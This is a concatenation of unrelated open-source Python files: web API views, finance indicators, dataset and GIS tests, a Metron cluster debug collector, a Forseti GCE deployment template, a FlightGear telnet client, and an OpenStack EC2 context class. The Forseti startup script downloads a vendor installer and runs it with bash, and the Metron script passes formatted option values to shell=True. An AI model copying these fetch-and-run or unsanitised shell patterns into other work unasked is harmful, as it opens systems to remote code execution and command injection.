character_counters[character_counter_id] = {"min_length": min_length,
"max_length": max_length}
if popover:
popover_id = field_name + '-' + str(instance_id)
popovers[popover_id] = popover
if tooltip:
tooltip_id = field_name + '-' + str(instance_id)
tooltips[tooltip_id] = tooltip
if error_message:
error_message_id = field_name + '-' + str(instance_id)
error_messages[error_message_id] = error_message
form_template = form_template + render_template(
'custom_request_form_templates/{}_template.html'.format(field_type), field_text=field_text,
field_name=field_name, options=field_values, field_required=field_required,
min_length=min_length, max_length=max_length, instance_id=instance_id, placeholder=placeholder,
character_counter=character_counter, tooltip=tooltip, help_text=help_text,
past_date_invalid=past_date_invalid, current_date_invalid=current_date_invalid,
future_date_invalid=future_date_invalid) + '\n'
data['form_template'] = form_template
data['character_counters'] = character_counters
data['popovers'] = popovers
data['tooltips'] = tooltips
data['error_messages'] = error_messages
return jsonify(data), 200
@agency_api_blueprint.route('/request_types/<string:agency_ein>', methods=['GET'])
def get_request_types(agency_ein):
"""
Retrieve the request types (custom request form names) for the specified agency.
:param agency_ein: Agency EIN (String)
:return: JSON Object({"request_type": [('', 'All'), ('Form Name', 'Form Name')]}), 200
"""
if current_user.is_agency_active(agency_ein):
agency = Agencies.query.filter_by(ein=agency_ein).one_or_none()
if agency is not None and agency.agency_features['custom_request_forms']['enabled']:
request_types = [
(custom_request_form.form_name, custom_request_form.form_name)
for custom_request_form in CustomRequestForms.query.filter_by(
agency_ein=agency_ein
).order_by(asc(CustomRequestForms.category), asc(CustomRequestForms.id)).all()
]
request_types.insert(0, ("", "All"))
return jsonify({"request_types": request_types}), 200
return jsonify({}), 404
|
CityOfNewYork/NYCOpenRecords
|
app/agency/api/views.py
|
Python
|
apache-2.0
| 8,238
|
from . import AbstractIndicator
# tracker for dynamic indicators
# it's purpose is tracking mix and max values of upstream indicators at the given time slot
# for static indicators: min and max will have the same value all the time
# (the value at the given time won't change)
class MinMaxTracker(AbstractIndicator):
def __init__(self):
AbstractIndicator.__init__(self)
self.reset()
def reset(self):
# collection with (min, max) tupples
self.__all_min_max = []
@property
def result(self):
return self.__all_min_max[-1]
@property
def all_result(self):
return self.__all_min_max
def on_new_upstream_value(self, new_value):
if new_value is None:
self.__all_min_max.append(None)
else:
if type(new_value) is list:
self.__update_result(new_value)
else:
raise ValueError("Non-list types are not supported.")
def __update_result(self, input_list):
current_result_index = 0
for input_item in input_list:
# if there's already list with elements
if len(self.__all_min_max) > current_result_index:
current_result = self.__all_min_max[current_result_index]
# None input doesn't change anything in existing elements
if input_item is not None:
if current_result is None:
current_min = current_max = input_item
else:
current_min = min(current_result[0], input_item)
current_max = max(current_result[1], input_item)
self.__all_min_max[current_result_index] = (current_min, current_max)
else:
# if there's no list of elements, we have to create it
if input_item is None:
self.__all_min_max.append(None)
else:
self.__all_min_max.append((input_item, input_item))
current_result_index += 1
|
quantwizard-com/pythonbacktest
|
pythonbacktest/indicator/minmaxtracker.py
|
Python
|
apache-2.0
| 2,081
|
# coding=utf-8
# Copyright 2022 The TensorFlow Datasets Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""rlu_locomotion dataset."""
import tensorflow_datasets.public_api as tfds
from tensorflow_datasets.rl_unplugged.rlu_locomotion import rlu_locomotion
class RluLocomotionTest(tfds.testing.DatasetBuilderTestCase):
"""Tests for rlu_locomotion dataset."""
DATASET_CLASS = rlu_locomotion.RluLocomotion
SPLITS = {
'train': 2, # Number of fake train example
}
SKIP_TF1_GRAPH_MODE = True
BUILDER_CONFIG_NAMES_TO_TEST = ['humanoid_corridor']
@classmethod
def setUpClass(cls):
rlu_locomotion.RluLocomotion._INPUT_FILE_PREFIX = cls.dummy_data
rlu_locomotion.RluLocomotion._SHARDS = 1
super().setUpClass()
if __name__ == '__main__':
tfds.testing.test_main()
|
tensorflow/datasets
|
tensorflow_datasets/rl_unplugged/rlu_locomotion/rlu_locomotion_test.py
|
Python
|
apache-2.0
| 1,304
|
import math
from synapse.tests.common import *
import synapse.lib.gis as s_gis
# earth mean radius in mm
r = 6371008800
ratios = {
'cm': 10.0,
'm': 1000.0,
'km': 1000000.0,
}
km = 1000000.0 # using mm as base units
gchq = (51.8994, -2.0783)
class GisTest(SynTest):
def test_lib_gis_haversine(self):
px = (36.12, -86.67)
py = (33.94, -118.40)
self.eqish(s_gis.haversine(px, py), 2886448429.7648544)
# Test haversinve value from rosetta code
r = s_gis.haversine((36.12, -86.67), (33.94, -118.40), 6372.8)
e = 2887.2599506071106
self.eqish(r, e)
# Test against 1/4th of a unit sphere
r = s_gis.haversine((45, 45), (-45, 45), 1.0)
e = math.pi / 2
# We are typically within the machine-epsilon range for this test
self.assertAlmostEqual(r, e)
# Test against the haversine package
lyon = (45.7597, 4.8422)
paris = (48.8567, 2.3508)
r = s_gis.haversine(lyon, paris, r=6371)
e = 392.21671780659625
self.assertAlmostEqual(r, e)
def test_lib_gis_latlong(self):
self.assertRaises(ValueError, s_gis.latlong, 'hehe')
self.assertRaises(ValueError, s_gis.latlong, 'hehe,hoho')
self.eq(s_gis.latlong(' 0,0 '), (0.0, 0.0))
self.eq(s_gis.latlong('-0,0 '), (0.0, 0.0))
self.eq(s_gis.latlong('50,100 '), (50.0, 100.0))
self.eq(s_gis.latlong('-50,100 '), (-50.0, 100.0))
self.eq(s_gis.latlong('-50,-100 '), (-50.0, -100.0))
self.eq(s_gis.latlong('50,-100 '), (50.0, -100.0))
self.eq(s_gis.latlong(' 0.12345678901234567890,-0.12345678901234567890 '), (0.12345678901234568, -0.12345678901234568)) # Note precision
self.eq(s_gis.latlong('123.456,-987.654 '), (123.456, -987.654)) # Note Invalid coords
def test_lib_gis_near(self):
point = (0.0, 0.0)
dist = 0
points = []
self.false(s_gis.near(point, dist, points)) # no points
point = (0.0, 0.0)
dist = 0
points = [(0.0, 0.0)]
self.true(s_gis.near(point, dist, points)) # same point
point = (0.0, 0.0)
dist = 0
points = [(50.0, 50.0), (0.0, 0.0)]
self.true(s_gis.near(point, dist, points)) # far point and same point
point = (45.7597, 4.8422) # lyon
dist = 400000000 # actual haversine distance between lyon/paris is ~392217259mm
points = [(0.0, 0.0), (48.8567, 2.3508)] # 0,0 and paris
self.true(s_gis.near(point, dist, points))
point = (45.7597, 4.8422) # lyon
dist = 391000000 # actual haversine distance between lyon/paris is ~392217259mm
points = [(0.0, 0.0), (48.8567, 2.3508)] # 0,0 and paris
self.false(s_gis.near(point, dist, points))
def test_lib_gis_dms2dec(self):
self.eqish(s_gis.dms2dec(45, 46, 52), 45.78111111111111)
def test_lib_gis_bbox(self):
lbox = s_gis.bbox(gchq[0], gchq[1], 1 * km)
self.eq(lbox, (51.890406796362754,
51.908393203637246,
-2.0928746526154747,
-2.0637253473845254))
|
vivisect/synapse
|
synapse/tests/test_lib_gis.py
|
Python
|
apache-2.0
| 3,170
|
#!/usr/bin/python
"""
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from optparse import OptionParser
from requests.auth import HTTPBasicAuth
from contextlib import closing
import datetime
import getpass
import json
import os
import os.path
import requests
import shutil
import subprocess
import sys
import tarfile
import zlib
INDENT_SIZE = 2
class UserPrompt(object):
def __init__(self, prompt):
self.prompt = prompt
def get_hidden(self):
return getpass.getpass(self.prompt)
class FileWriter(object):
def write(self, path, content):
print "Writing config to " + path
if not os.path.exists(os.path.dirname(path)):
try:
os.makedirs(os.path.dirname(path))
except OSError as exc: # Guard against race condition
if exc.errno != errno.EEXIST:
raise
with open(path, 'w') as outfile:
outfile.write(content)
print "...done"
class ShellHandler(object):
def __init__(self):
pass
# returns full stdout of process call
def call(self, command):
try:
return subprocess.call(command)
except OSError as e:
print >> sys.stderr, "Execution failed:", e
# partly hijacked from Python 2.7+ check_output for use in 2.6
def ret_output(self, cmd):
process = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True)
output, unused_err = process.communicate()
retcode = process.poll()
if retcode:
raise subprocess.CalledProcessError(retcode, cmd, output=output)
return output
class InfoGatherer(object):
def __init__(self, name):
self.name = name
class AmbariInfo(InfoGatherer):
def __init__(self, host_info, cluster_name):
super(AmbariInfo, self).__init__('Ambari')
self.cluster_name = cluster_name
self.ambari_config_url = 'http://{0}/api/v1/clusters/{1}/configurations/service_config_versions'.format(host_info, cluster_name)
self.params_payload = { 'is_current' : 'true' }
def collect(self, out_dir):
print "Ambari request URL: " + self.ambari_config_url
ambari_user = UserPrompt('Ambari username: ').get_hidden()
ambari_pass = UserPrompt('Ambari password: ').get_hidden()
self.get_cluster_config(out_dir, ambari_user, ambari_pass)
def get_cluster_config(self, out_dir, ambari_user, ambari_pass):
# set encoding to 'identity' to keep Ambari from passing back gzipped content for large requests
headers = {
'X-Requested-By' : 'ambari',
'Authorization' : 'Basic',
'Accept-Encoding': 'identity'
}
# Retrieving Ambari config detail
response = requests.get(self.ambari_config_url, headers=headers, params=self.params_payload, stream=True, auth=HTTPBasicAuth(ambari_user, ambari_pass))
if response.status_code == 200:
file_name = 'ambari-cluster-config.json'
full_out_path = os.path.join(out_dir, self.name.lower(), file_name)
FileWriter().write(full_out_path, response.text)
else:
print "Request failed with status code: " + str(response.status_code)
class StormInfo(InfoGatherer):
def __init__(self, host_info):
super(StormInfo, self).__init__('Storm')
url_base = 'http://{0}/api/v1'.format(host_info)
self.url_cluster_summary = url_base + '/cluster/summary'
self.url_cluster_configuration = url_base + '/cluster/configuration'
self.url_topology_summary = url_base + '/topology/summary'
self.url_topology_stats_summary = url_base + '/topology/{0}?sys=1'
def collect(self, out_dir):
self.get_cluster_summary(out_dir)
self.get_cluster_configuration(out_dir)
self.get_topology_summary(out_dir)
self.get_topology_stats_summary(out_dir)
def get_cluster_summary(self, out_dir):
response = requests.get(self.url_cluster_summary)
if response.status_code == 200:
file_name = 'cluster-summary.json'
full_out_path = os.path.join(out_dir, self.name.lower(), file_name)
FileWriter().write(full_out_path, json.dumps(response.json(), indent=INDENT_SIZE))
else:
print "Request failed with status code: " + str(response.status_code)
def get_cluster_configuration(self, out_dir):
response = requests.get(self.url_cluster_configuration)
if response.status_code == 200:
file_name = 'cluster-configuration.json'
full_out_path = os.path.join(out_dir, self.name.lower(), file_name)
FileWriter().write(full_out_path, json.dumps(response.json(), indent=INDENT_SIZE))
else:
print "Request failed with status code: " + str(response.status_code)
def get_topology_summary(self, out_dir):
response = requests.get(self.url_topology_summary)
if response.status_code == 200:
file_name = 'topology-summary.json'
full_out_path = os.path.join(out_dir, self.name.lower(), file_name)
FileWriter().write(full_out_path, json.dumps(response.json(), indent=INDENT_SIZE))
else:
print "Request failed with status code: " + str(response.status_code)
def get_topology_stats_summary(self, out_dir):
summary_response = requests.get(self.url_topology_summary)
if summary_response.status_code == 200:
for feature, value in summary_response.json().iteritems():
if feature == 'topologies':
for topology in value:
for k, v in topology.iteritems():
if k == 'id':
print "Retrieving Storm topology stats summary for topology-id " + v
response = requests.get(self.url_topology_stats_summary.format(v))
if response.status_code == 200:
file_name = 'topology-{0}-stats-summary.json'.format(v)
full_out_path = os.path.join(out_dir, self.name.lower(), 'stats-summaries', file_name)
FileWriter().write(full_out_path, json.dumps(response.json(), indent=INDENT_SIZE))
else:
print "Request failed with status code: " + str(response.status_code)
else:
print "Topology listing request failed with status code: " + str(summary_response.status_code)
class KafkaInfo(InfoGatherer):
def __init__(self, broker_list, zookeeper_quorum, hdp_home):
super(KafkaInfo, self).__init__('Kafka')
self.broker_list = broker_list
self.zookeeper_quorum = zookeeper_quorum
self.hdp_home = hdp_home
# note, need to escape the last single quote with the trim command so the string literal works
self.cmd_broker_id = '''{0}/kafka-broker/bin/zookeeper-shell.sh {1} <<< "ls /brokers/ids" | grep -e '\[.*\]' | tr -d [] | tr , ' \''''.format(self.hdp_home, self.zookeeper_quorum)
# broker id is dynamic and replaced later
self.cmd_broker_info = '''echo "get /brokers/ids/{0}" | {1}/kafka-broker/bin/zookeeper-shell.sh {2} 2>&1'''.format('{0}', self.hdp_home, self.zookeeper_quorum)
self.cmd_kafka_topics = '''{0}/kafka-broker/bin/kafka-topics.sh --zookeeper {1} --list'''.format(self.hdp_home, self.zookeeper_quorum)
self.cmd_topic_detail = '''{0}/kafka-broker/bin/kafka-topics.sh --zookeeper {1} --topic {2} --describe'''.format(self.hdp_home, self.zookeeper_quorum, '{0}')
def collect(self, out_dir):
print "Retrieving Kafka detail"
self.get_broker_info(out_dir)
self.get_kafka_topics(out_dir)
self.get_topic_detail(out_dir)
def get_broker_info(self, out_dir):
print "Retrieving Kafka broker info"
broker_ids = ShellHandler().ret_output(self.cmd_broker_id)
for broker in broker_ids.strip().split(','):
file_name = 'kafka-broker-{0}-info.txt'.format(broker)
full_out_path = os.path.join(out_dir, self.name.lower(), 'broker-info', file_name)
broker_data = ShellHandler().ret_output(self.cmd_broker_info.format(broker))
FileWriter().write(full_out_path, broker_data)
def get_kafka_topics(self, out_dir):
file_name = 'kafka-topics.txt'
full_out_path = os.path.join(out_dir, self.name.lower(), file_name)
topic_list = ShellHandler().ret_output(self.cmd_kafka_topics)
FileWriter().write(full_out_path, topic_list)
def get_topic_detail(self, out_dir):
file_name = 'kafka-enrichments-topic.txt'
full_out_path = os.path.join(out_dir, self.name.lower(), file_name)
enrichment_topic_detail = ShellHandler().ret_output(self.cmd_topic_detail.format('enrichments'))
FileWriter().write(full_out_path, enrichment_topic_detail)
file_name = 'kafka-indexing-topic.txt'
full_out_path = os.path.join(out_dir, self.name.lower(), file_name)
indexing_topic_detail = ShellHandler().ret_output(self.cmd_topic_detail.format('indexing'))
FileWriter().write(full_out_path, indexing_topic_detail)
class MetronInfo(InfoGatherer):
def __init__(self, metron_home, zookeeper_quorum):
super(MetronInfo, self).__init__('Metron')
self.metron_home = metron_home
self.zookeeper_quorum = zookeeper_quorum
self.cmd_zk_load_configs = '''{0}/bin/zk_load_configs.sh -m DUMP -z {1}'''.format(self.metron_home, self.zookeeper_quorum)
self.cmd_metron_lib_list = '''ls -al {0}/lib'''.format(self.metron_home)
def collect(self, out_dir):
self.get_metron_config(out_dir)
self.get_metron_flux(out_dir)
self.get_metron_zk_config(out_dir)
self.get_lib_listing(out_dir)
self.get_rpm_listing(out_dir)
def get_metron_config(self, out_dir):
print 'Copying ' + self.metron_home + '/config'
full_out_path = os.path.join(out_dir, self.name.lower(), 'config')
shutil.copytree(self.metron_home + '/config', full_out_path)
def get_metron_flux(self, out_dir):
print 'Copying ' + self.metron_home + '/flux'
full_out_path = os.path.join(out_dir, self.name.lower(), 'flux')
shutil.copytree(self.metron_home + '/flux', full_out_path)
def get_metron_zk_config(self, out_dir):
zk_config_dump = ShellHandler().ret_output(self.cmd_zk_load_configs)
full_out_path = os.path.join(out_dir, self.name.lower(), 'zk-configs.txt')
FileWriter().write(full_out_path, zk_config_dump)
def get_lib_listing(self, out_dir):
metron_lib_list = ShellHandler().ret_output(self.cmd_metron_lib_list)
full_out_path = os.path.join(out_dir, self.name.lower(), 'metron-libs-dir.txt')
FileWriter().write(full_out_path, metron_lib_list)
def get_rpm_listing(self, out_dir):
metron_rpm_list = ShellHandler().ret_output('''rpm -qa | grep 'metron\|elasticsearch\|kibana\'''')
full_out_path = os.path.join(out_dir, self.name.lower(), 'metron-rpm-list.txt')
FileWriter().write(full_out_path, metron_rpm_list)
class HdpInfo(InfoGatherer):
def __init__(self, hdp_home):
super(HdpInfo, self).__init__('HDP')
self.hdp_home = hdp_home
def collect(self, out_dir):
hadoop_version_info = ShellHandler().ret_output('hadoop version')
full_out_path = os.path.join(out_dir, self.name.lower(), 'version-info.txt')
FileWriter().write(full_out_path, hadoop_version_info)
class ClusterInfo:
def __init__(self):
pass
def main(self):
(options, args) = self.get_cli_args()
self.collect_data(options.out_dir,
options.ambari_host,
options.cluster_name,
options.storm_host,
options.broker_list,
options.zookeeper_quorum,
options.metron_home,
options.hdp_home)
def get_cli_args(self):
parser = OptionParser()
parser.add_option("-a", "--ambari-host",
action="store",
type="string",
dest="ambari_host",
help="Connect to Ambari via the supplied host:port",
default="node1:8080",
metavar="HOST:PORT")
parser.add_option("-c", "--cluster-name",
action="store",
type="string",
dest="cluster_name",
help="Name of cluster in Ambari to retrieve info for",
default="metron_cluster",
metavar="NAME")
parser.add_option("-o", "--out-dir",
action="store",
type="string",
dest="out_dir",
help="Write debugging data to specified root directory",
default=".",
metavar="DIRECTORY")
parser.add_option("-s", "--storm-host",
action="store",
type="string",
dest="storm_host",
help="Connect to Storm via the supplied host:port",
default="node1:8744",
metavar="HOST:PORT")
parser.add_option("-b", "--broker_list",
action="store",
type="string",
dest="broker_list",
help="Connect to Kafka via the supplied comma-delimited host:port list",
default="node1:6667",
metavar="HOST1:PORT,HOST2:PORT")
parser.add_option("-z", "--zookeeper_quorum",
action="store",
type="string",
dest="zookeeper_quorum",
help="Connect to Zookeeper via the supplied comma-delimited host:port quorum list",
default="node1:2181",
metavar="HOST1:PORT,HOST2:PORT")
parser.add_option("-m", "--metron_home",
action="store",
type="string",
dest="metron_home",
help="Metron home directory",
default="/usr/metron/0.5.1",
metavar="DIRECTORY")
parser.add_option("-p", "--hdp_home",
action="store",
type="string",
dest="hdp_home",
help="HDP home directory",
default="/usr/hdp/current",
metavar="DIRECTORY")
return parser.parse_args()
def collect_data(self,
out_dir_base,
ambari_host,
cluster_name,
storm_host,
broker_list,
zookeeper_quorum,
metron_home,
hdp_home):
out_dir = self.get_out_dirname(out_dir_base)
info_getters = [
AmbariInfo(ambari_host, cluster_name),
StormInfo(storm_host),
KafkaInfo(broker_list, zookeeper_quorum, hdp_home),
MetronInfo(metron_home, zookeeper_quorum),
HdpInfo(hdp_home)
]
for getter in info_getters:
getter.collect(out_dir)
self.compress_files(out_dir)
print "Finished gathering debug info"
# creates dir w/timestamp to drop all configs
# e.g. metron-debug-2018-03-24_06-50-34
def get_out_dirname(self, out_dir_base):
return os.path.join(out_dir_base, 'metron-debug-' + datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S'))
def compress_files(self, out_dir):
tarball_name = out_dir + '.tgz'
print "Creating tarfile bundle with all configs: '{0}'".format(tarball_name)
with closing(tarfile.open(tarball_name, 'w:gz')) as tar:
tar.add(out_dir, arcname=os.path.basename(out_dir))
print "...done"
if __name__ == "__main__":
ClusterInfo().main()
|
cestella/incubator-metron
|
metron-platform/metron-common/src/main/scripts/cluster_info.py
|
Python
|
apache-2.0
| 17,320
|
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Creates a GCE instance template for Forseti Security."""
def GenerateConfig(context):
"""Generate configuration."""
USE_BRANCH = context.properties.get('branch-name')
ORGANIZATION_ID = context.properties['organization-id']
if USE_BRANCH:
DOWNLOAD_FORSETI = """
git clone {}.git --branch {} --single-branch forseti-security
cd forseti-security
""".format(
context.properties['src-path'],
context.properties['branch-name'])
else:
DOWNLOAD_FORSETI = """
wget -qO- {}/archive/v{}.tar.gz | tar xvz
cd forseti-security-{}
""".format(
context.properties['src-path'],
context.properties['release-version'],
context.properties['release-version'])
CLOUDSQL_CONN_STRING = '{}:{}:{}'.format(
context.env['project'],
'$(ref.cloudsql-instance.region)',
'$(ref.cloudsql-instance.name)')
SCANNER_BUCKET = context.properties['scanner-bucket']
SERVICE_ACCOUNT_SCOPES = context.properties['service-account-scopes']
FORSETI_CONFIG = context.properties['forseti-config']
inventory_command = (
'/usr/local/bin/forseti_inventory --forseti_config {} '
.format(
FORSETI_CONFIG,
)
)
scanner_command = (
('/usr/local/bin/forseti_scanner --rules {} --engine {} '
'--forseti_config {} ')
.format(
'gs://{}/scanner_violations'.format(SCANNER_BUCKET),
'IamRulesEngine',
FORSETI_CONFIG,
)
)
# TODO: remove this little hack when we update the release...
NEW_FORSETI_CONFIG = """
# Build protos separately.
python build_protos.py --clean
"""
OLD_BUILD_PROTOS = ''
resources = []
resources.append({
'name': '{}-vm'.format(context.env['deployment']),
'type': 'compute.v1.instance',
'properties': {
'zone': context.properties['zone'],
'machineType': (
'https://www.googleapis.com/compute/v1/projects/{}'
'/zones/{}/machineTypes/{}'.format(
context.env['project'], context.properties['zone'],
context.properties['instance-type'])),
'disks': [{
'deviceName': 'boot',
'type': 'PERSISTENT',
'boot': True,
'autoDelete': True,
'initializeParams': {
'sourceImage': (
'https://www.googleapis.com/compute/v1'
'/projects/{}/global/images/family/{}'.format(
context.properties['image-project'],
context.properties['image-family']
)
)
}
}],
'networkInterfaces': [{
'network': (
'https://www.googleapis.com/compute/v1/'
'projects/{}/global/networks/default'.format(
context.env['project'])),
'accessConfigs': [{
'name': 'External NAT',
'type': 'ONE_TO_ONE_NAT'
}]
}],
'serviceAccounts': [{
'email': context.properties['service-account'],
'scopes': SERVICE_ACCOUNT_SCOPES,
}],
'metadata': {
'items': [{
'key': 'startup-script',
'value': """#!/bin/bash
exec > /tmp/deployment.log
exec 2>&1
# Ubuntu update
sudo apt-get update -y
sudo apt-get upgrade -y
# Forseti setup
sudo apt-get install -y git unzip
# Forseti dependencies
sudo apt-get install -y libmysqlclient-dev python-pip python-dev
USER_HOME=/home/ubuntu
# Install fluentd if necessary
FLUENTD=$(ls /usr/sbin/google-fluentd)
if [ -z "$FLUENTD" ]; then
cd $USER_HOME
curl -sSO https://dl.google.com/cloudagents/install-logging-agent.sh
bash install-logging-agent.sh
fi
# Check whether Cloud SQL proxy is installed
CLOUD_SQL_PROXY=$(ls $USER_HOME/cloud_sql_proxy)
if [ -z "$CLOUD_SQL_PROXY" ]; then
cd $USER_HOME
wget https://dl.google.com/cloudsql/cloud_sql_proxy.{}
mv cloud_sql_proxy.{} cloud_sql_proxy
chmod +x cloud_sql_proxy
fi
$USER_HOME/cloud_sql_proxy -instances={}=tcp:{} &
# Check if rules.yaml exists
RULES_FILE=$(gsutil ls gs://{}/rules/rules.yaml)
if [ $? -eq 1 ]; then
cd $USER_HOME
read -d '' RULES_YAML << EOF
rules:
- name: sample whitelist
mode: whitelist
resource:
- type: organization
applies_to: self_and_children
resource_ids:
- {}
inherit_from_parents: true
bindings:
- role: roles/*
members:
- serviceAccount:*@*.gserviceaccount.com
EOF
echo "$RULES_YAML" > $USER_HOME/rules.yaml
gsutil cp $USER_HOME/rules.yaml gs://{}/rules/rules.yaml
fi
# Install Forseti Security
cd $USER_HOME
rm -rf forseti-*
rm -rf run_forseti.sh
pip install --upgrade pip
pip install --upgrade setuptools
pip install grpcio grpcio-tools
{}
# Download Forseti src; see DOWNLOAD_FORSETI
{}
# Prevent namespace clash
pip uninstall --yes protobuf
{}
python setup.py install
# Create the startup run script
read -d '' RUN_FORSETI << EOF
#!/bin/bash
# inventory command
{}
# scanner command
{}
EOF
echo "$RUN_FORSETI" > $USER_HOME/run_forseti.sh
chmod +x $USER_HOME/run_forseti.sh
/bin/sh $USER_HOME/run_forseti.sh
(echo "0 * * * * $USER_HOME/run_forseti.sh") | crontab -
""".format(
# cloud_sql_proxy
context.properties['cloudsqlproxy-os-arch'],
context.properties['cloudsqlproxy-os-arch'],
CLOUDSQL_CONN_STRING,
context.properties['db-port'],
# rules.yaml
SCANNER_BUCKET,
ORGANIZATION_ID,
SCANNER_BUCKET,
# old style build protobufs
OLD_BUILD_PROTOS,
# install forseti
DOWNLOAD_FORSETI,
# copy Forseti config file
NEW_FORSETI_CONFIG,
# run_forseti.sh
# - forseti_inventory
inventory_command,
# - forseti_scanner
scanner_command,
)
}]
}
}
})
return {'resources': resources}
|
cschnei3/forseti-security
|
deployment-templates/forseti-instance.py
|
Python
|
apache-2.0
| 6,784
|
from telnetlib import Telnet
from telnetlib import IAC, NOP
import socket
import re
from string import split
__all__ = ["FlightGear"]
CRLF = '\r\n'
class FGTelnet(Telnet):
def __init__(self, host, port):
Telnet.__init__(self, host, port)
self.prompt = []
self.sock.sendall(IAC + NOP)
self.prompt.append(re.compile('/[^>]*> '))
self.timeout = 5
# Telnet.set_debuglevel(self,2)
def help(self):
return
def ls(self, dir=None):
"""
Returns a list of properties.
"""
if dir == None:
self._putcmd('ls')
else:
self._putcmd('ls %s' % dir)
return self._getresp()
def dump(self):
"""Dump current state as XML."""
self._putcmd('dump')
return self._getresp()
def cd(self, dir):
"""Change directory."""
self._putcmd('cd ' + dir)
self._getresp()
return
def pwd(self):
"""Display current path."""
self._putcmd('pwd')
return self._getresp()
def get(self, var):
"""Retrieve the value of a parameter."""
self._putcmd('get %s' % var)
return self._getresp()
def set(self, var, value):
"""Set variable to a new value"""
self._putcmd('set %s %s' % (var, value))
self._getresp() # Discard response
def quit(self):
"""Terminate connection"""
self._putcmd('quit')
self.close()
return
# Internal: send one command to FlightGear
def _putcmd(self, cmd):
cmd = cmd + CRLF;
Telnet.write(self, cmd)
return
# Internal: get a response from FlightGear
def _getresp(self):
(i, match, resp) = Telnet.expect(self, self.prompt, self.timeout)
# Remove the terminating prompt.
# Everything preceding it is the response.
return split(resp, '\n')[:-1]
class FlightGear:
"""FlightGear interface class.
An instance of this class represents a connection to a FlightGear telnet
server.
Properties are accessed using a dictionary style interface:
For example:
# Connect to flightgear telnet server.
fg = FlightGear('myhost', 5500)
# parking brake on
fg['/controls/gear/brake-parking'] = 1
# Get current heading
heading = fg['/orientation/heading-deg']
Other non-property related methods
"""
def __init__(self, host='localhost', port=5500):
try:
self.telnet = FGTelnet(host, port)
except socket.error, msg:
self.telnet = None
raise socket.error, msg
def __del__(self):
# Ensure telnet connection is closed cleanly.
self.quit()
def __getitem__(self, key):
"""Get a FlightGear property value.
Where possible the value is converted to the equivalent Python type.
"""
s = self.telnet.get(key)[0]
match = re.compile('[^=]*=\s*\'([^\']*)\'\s*([^\r]*)\r').match(s)
if not match:
return None
value, type = match.groups()
# value = match.group(1)
#type = match.group(2)
if value == '':
return None
if type == '(double)':
return float(value)
elif type == '(int)':
return int(value)
elif type == '(bool)':
if value == 'true':
return 1
else:
return 0
else:
return value
def __setitem__(self, key, value):
"""Set a FlightGear property value."""
self.telnet.set(key, value)
def quit(self):
"""Close the telnet connection to FlightGear."""
if self.telnet:
self.telnet.quit()
self.telnet = None
def view_next(self):
# move to next view
self.telnet.set("/command/view/next", "true")
def view_prev(self):
# move to next view
self.telnet.set("/command/view/prev", "true")
|
niranjan94/flightgear-cc
|
flightgear-cc-bridge/libs/FlightGear.py
|
Python
|
apache-2.0
| 3,992
|
# Copyright 2014
# The Cloudscaling Group, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""RequestContext: context for requests that persist through all of ec2."""
from oslo_config import cfg
from oslo_context import context
from oslo_log import log as logging
from oslo_utils import timeutils
import six
from ec2api import clients
from ec2api import exception
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
class RequestContext(context.RequestContext):
"""Security context and request information.
Represents the user taking a given action within the system.
"""
def __init__(self, user_id, project_id, request_id=None,
is_admin=None, remote_address=None,
auth_token=None, user_name=None, project_name=None,
overwrite=True, service_catalog=None, api_version=None,
is_os_admin=None, **kwargs):
"""Parameters
:param overwrite: Set to False to ensure that the greenthread local
copy of the index is not overwritten.
:param kwargs: Extra arguments that might be present, but we ignore
because they possibly came in from older rpc messages.
"""
user = kwargs.pop('user', None)
tenant = kwargs.pop('tenant', None)
super(RequestContext, self).__init__(
auth_token=auth_token,
user=user_id or user,
tenant=project_id or tenant,
is_admin=is_admin,
request_id=request_id,
resource_uuid=kwargs.pop('resource_uuid', None),
overwrite=overwrite)
# oslo_context's RequestContext.to_dict() generates this field, we can
# safely ignore this as we don't use it.
kwargs.pop('user_identity', None)
self.session = kwargs.pop('session', None)
if kwargs:
LOG.warning('Arguments dropped when creating context: %s',
str(kwargs))
self.user_id = user_id
self.project_id = project_id
self.remote_address = remote_address
timestamp = timeutils.utcnow()
if isinstance(timestamp, six.string_types):
timestamp = timeutils.parse_strtime(timestamp)
self.timestamp = timestamp
self.service_catalog = service_catalog
if self.service_catalog is None:
# if list is empty or none
self.service_catalog = []
self.user_name = user_name
self.project_name = project_name
self.is_admin = is_admin
# TODO(ft): call policy.check_is_admin if is_admin is None
self.is_os_admin = is_os_admin
self.api_version = api_version
def to_dict(self):
values = super(RequestContext, self).to_dict()
# FIXME(dims): defensive hasattr() checks need to be
# removed once we figure out why we are seeing stack
# traces
values.update({
'user_id': getattr(self, 'user_id', None),
'project_id': getattr(self, 'project_id', None),
'is_admin': getattr(self, 'is_admin', None),
'remote_address': getattr(self, 'remote_address', None),
